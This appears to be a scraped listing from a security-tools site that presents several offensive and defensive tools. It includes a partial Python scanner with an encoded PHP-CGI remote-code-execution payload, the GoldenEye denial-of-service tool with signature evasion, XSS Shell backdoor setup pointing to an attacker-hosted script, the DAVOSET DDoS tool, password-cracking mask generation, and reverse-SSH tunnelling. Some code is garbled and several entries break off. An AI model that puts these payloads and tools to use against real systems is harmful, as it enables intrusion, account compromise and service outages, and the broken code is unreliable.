Mac OS

Apple Mac OS X

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        haxor =, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.


The post-quantum cryptography tool.
This is a GnuPG-like unix program for encryption and signing that uses only quantum-computer-resistant algorithms:
McEliece cryptosystem (compact quasi-dyadic variant) for encryption
Hash-based Merkle tree algorithm (FMTSeq variant) for digital signatures

Why this?
Go read

package downloads:

There is a complete, UNIXy manual page supplied with the package. You can view it online here:

Quick How-To
Everything is meant to work mostly like GnuPG, but with some good simplicity margin. Let's play with random data!

ccr -g help
ccr -g fmtseq128-sha --name "John Doe"    # your signature key
ccr -g mceqd128 --name "John Doe"     # your encryption key

ccr -K  #watch the generated keys
ccr -k

ccr -p -a -o my_pubkeys.asc -F Doe  # export your pubkeys for friends

#see what people sent us
ccr -ina < friends_pubkeys.asc

#import Frank's key and rename it
ccr -ia -R friends_pubkeys.asc --name "Friendly Frank"

#send a nice message to Frank (you can also specify him by @12345 keyid)
ccr -se -r Frank < Document.doc > Message_to_frank.ccr

#receive a reply
ccr -dv -o Decrypted_verified_reply.doc <Reply_from_frank.ccr

#rename other's keys
ccr -m Frank -N "Unfriendly Frank"

#and delete pukeys of everyone who's Unfriendly
ccr -x Unfri

#create hashfile from a large file
ccr -sS hashfile.ccr < big_data.iso

#verify the hashfile
ccr -vS hashfile.ccr < the_same_big_data.iso

Option reference
For completeness I add listing of all options here (also available from ccr --help)
Usage: ./ccr [options]

Common options:
 -h, --help     display this help
 -V, --version  display version information
 -T, --test     perform (probably nonexistent) testing/debugging stuff

Global options:


Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.


GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye is an HTTP/S Layer 7 denial of service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

Changes: Referer strings from search engines now only domain part hardcoded. Referer generation function now generates even more random referers. Evades Juniper Netscreen signature. Various other updates and improvements.

Flag Description Default
-t, --threads Number of concurrent threads (default: 500)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help


Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

util/ - Fetchs user-agent lists from subpages (ex: ./ REQUIRES BEAUTIFULSOUP4

XSS Shell

XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by “XSS-Proxy –”. Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page.

XSS Shell uses ASP + MS Access database as backend but you can simply port them into any other server-side solution. You just need to stick with simple communication protocol.
Install Admin Interface

Copy “xssshell” folder into your web server
Copy “db” to a secure place (below root)
Configure “database path” from “xssshell/db.asp”
Modify hard coded password in db.asp [default password is : w00t]
Now you can access admin interface from something like http://[YOURHOST]/xssshell/

Configure XSS Shell for communication;
Open xssshell.asp
2. Set “SERVER” variable to where your XSSShell folder is located. i.e: “http://[YOURHOST]/xssshell/”;
3. Be sure to check “ME”, “CONNECTOR”, “COMMANDS_URL” variables. If you changed filenames, folder names or some kind of different configuration you need modify them.

Now open your admin interface from your browser,
To test it, just modify “sample_victim/default.asp” source code and replace “http://attacker:81/release/xssshell.js” URL with your own XSS Shell URL. Open “sample_victim” folder in some other browser and may be upload in to some other server.

Now you should see a zombie in admin interface. Just write something into “parameters” textarea and click “alert()”. You should see an alert message in victim’s browser.

Security Notes
As a hunter be careful about possible “Backfire” in getSelfHTML(). Someone can hack you back or track you by another XSS or XSS Shell attack.
Checkout “showdata.asp” and implement your own “filter()” function to make it safer for you.
Put “On error resume next” to db.asp, better modify your web server to not show any error.

PACK - Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

The most basic analysis that you can perform is simply obtaining most common length, character-set and other characteristics of passwords in the provided list. In the example below, we will use 'rockyou.txt' containing approximately 14 million passwords. Launch with the following command line:
$ python rockyou.txt

Using filters
Let's see how RockYou users tend to select their passwords using the "stringdigit" simple mask (a string followed by numbers):
$ python ../PACK-0.0.3/archive/rockyou.txt --simplemask stringdigit -q --hiderare

Saving advanced masks
While the "Advanced Mask" section only displays patterns matching greater than 1% of all passwords, you can obtain and save a full list of password masks matching a given dictionary by using the following command:
$ python rockyou.txt -o rockyou.masks

MaskGen allows you to craft pattern-based mask attacks for input into Hashcat family of password crackers. The tool uses output produced by statsgen above with the '-o' flag in order to produce the most optimal mask attack sorted by mask complexity, mask occurrence or ratio of the two (optimal index).
Let's run MaskGen with only StatGen's output as an argument:
$ python rockyou.masks

Specifying target time


(Translation provided by google)
DDoS attacks via other sites execution tool (DAVOSET) - a tool for use by Abuse of Functionality and XML External Entities vulnerabilities at some sites for attacks on other sites (including DoS and DDoS attacks). Which was developed by me in 2010.

On these attacks, I wrote the article sites use to attack other sites . In the article the effectiveness of the attacks on sites through the use of other sites I announced DAVOSET and explored the effectiveness of these attacks. I also wrote about the benefits of these attacks .

This tool is written in perl.

# DDoS attacks via other sites execution tool
# DAVOSET v.1.1.4
# Tool for conducting of DDoS attacks on the sites via other sites
# Copyright (C) MustLive 2010-2013
# Last update: 03.12.2013
# <a href="Http://<br />
#" title="Http://<br />
#">Http://<br />
#</a> # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Program summary
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

SSH Back

SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl.

              __     ______              __
.-----.-----.|  |--.|   __ \.---.-.----.|  |--.
|__ --|__ --||     ||   __ <|  _  |  __||    <
Copyright (C) 2014

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Have you ever needed to have access to an ssh server from behind
a NAT'ed firewall? Now you can. SSHBack allows you to have reverse
ssh connections connect back to you.

Made from 100% FOSS recycled materials, this software is made to
withstand the most demanding conditions, including, but not
limited to: __FILL_IN_BLANK_HERE__

(For amusement purposes only. Do not abuse or misuse this product.
Do not ruin anyone's day with this software, please!)

sshback client machine: has openssh-server on
sshback sever machine: has openssh-client on

NOTE: "Server_Common_Name" must be able to DNS resolve
      on the client machine, e.g.
$ host <a href="<br />" title="<br />"><br /></a> has address

$ ./
to make all the certs

then move client.pem, server.crt, and to the
  machine with openssh-server installed
make sure 'socat' is installed
chmod +x


OpenFPC is a set of scripts that combine to provide a lightweight full-packet network traffic recorder & buffering tool. It's design goal is to allow non-expert users to deploy a distributed network traffic recorder on COTS hardware while integrating into existing alert and log tools.

OpenFPC is described as lightweight because it follows a different design model to other FPC/Network traffic forensic tools that I have seen. It doesn't provide a user with the ability to trigger automatic events (IDS-like functions), or watch for anomalous traffic changes (NBA-like functions) as it is assumed external open source, or comercial tools already provide this detection capability. OpenFPC fits in as a companion to provide extra (full packet/traffic stream) data as a bolt-on to these tools allowing deeper analysis of event data where required.

Simply give it a logfile entry in one of the supported formats, and it will provide you with the PCAP.

For more information, visit the OpenFPC project home at
Features and futures

Automated install on Debain and RH style distributions
Extraction of single streams based on event occurrence time, or start/end timestamps
Extracts stream data based on common logfile/alert formats

Distributed collection with central extraction Optional compression and extract checksums Ability to request data from external tools/user interfaces

Central web-based UI for stream/data extraction from distributed remote storage buffers
Automatic calculation of an optimal configuration for extraction speed based on available storage.

Syndicate content